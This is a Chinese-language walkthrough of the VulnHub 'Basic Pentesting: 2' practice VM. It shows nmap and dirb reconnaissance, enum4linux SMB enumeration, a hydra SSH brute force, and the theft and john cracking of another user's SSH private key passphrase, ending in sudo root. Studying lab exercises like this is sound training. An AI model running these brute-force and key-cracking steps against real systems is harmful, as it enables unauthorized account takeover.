当前位置: 首页 > article >正文

Vulhub Basic Pentesting: 2 Target Machines

项目地址

https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz

修改静态ip

开机按e

输入rw signie init=/bin/bash

ctrl+x 进入编辑这个文件

vi /etc/network/interfaces

修改网卡为ens33

保存退出

实验过程

开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知Basic Pentesting: 2的一个ip地址为192.168.47.176

扫描Basic Pentesting: 2的操作系统,端口及对应服务

nmap -A -p- 192.168.47.176

发现该靶机开放了22,80,139,445,8009,8080端口

目录扫描

dirb http://192.168.47.176

信息收集

访问网站

拼接/development

存在两个文件,逐个点开看看

利用kali的enum4linux工具枚举SMB服务中的信息

enum4linux -a -o 192.168.47.176

成功的排列出两个用户名信息,也符合上述中交流的J和K

获取shell

我们已知账户名,而且又知道J用户存在弱密码问题,那就利用kali的九头蛇爆破

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.47.176 -t 64 

得到jan密码为armando

提权

ssh连接

ssh jan@192.168.47.176

登陆成功

查看可利用命令

sudo -l

没有权限

逐个查看可疑的文件 -> /home/kay/目录存在pass.bak文件,但无访问权限

但是可以访问kay用户的ssh私钥文件

cd .ssh
ls -al
cat id_rsa

复制私钥至本地,赋予执行权限

vi 1
chmod +x 1

通过python转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码

python /usr/share/john/ssh2john.py 1 > ssh_login
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login

获得密钥:beeswax

尝试登录ssh

ssh -i 1 kay@192.168.47.176

登录成功

查看可利用命令

sudo -l

密码不大行

有一个pass.bak文件,查看一下

这个可能是kay用户的密码,尝试使用命令sudo -l,输入密码成功

发现是ALL

直接sudo su提权

提权成功


http://www.kler.cn/news/357281.html

相关文章:

  • 《中医四大经典》2.0
  • [Unity Demo]从零开始制作空洞骑士Hollow Knight第十六集(下篇):制作小BOSS龙牙哥
  • 初识适配器模式
  • MyBatis方法重载与XML中ID的重复性
  • 面试手撕代码-二十三种设计模式之组合模式
  • Thread类的介绍
  • 【MySQL】入门篇—基本数据类型:数字类型、字符串类型、日期时间类型
  • WPF 笔迹算法 从点集转笔迹轮廓
  • Elasticsearch学习笔记(七)安装并配置Metricbeat
  • 嘉立创EDA个人学习笔记2(绘制51单片机核心板)
  • WSL2系统下mamba-yolo模型的深度学习环境搭建
  • 有口才的从业者一定是位人才
  • Android 11.0 系统默认蓝牙打开状态栏显示蓝牙图标功能实现
  • ★ C++进阶篇 ★ 红黑树实现
  • 机器学习的优缺点
  • 2024产品管理新风向:项目管理软件不懂敏捷开发?
  • 【mod分享】波斯王子遗忘之沙高清重置,纹理,字体,贴图全部重置,特效增强,支持光追
  • 三、MyBatis实践(3):多表映射,动态语句,高级扩展
  • Hadoop生态圈三大组件:HDFS的读写流程、MapReduce计算流程、Yarn资源调度
  • Cesium 实战 - 自定义纹理材质 - 立体墙(旋转材质)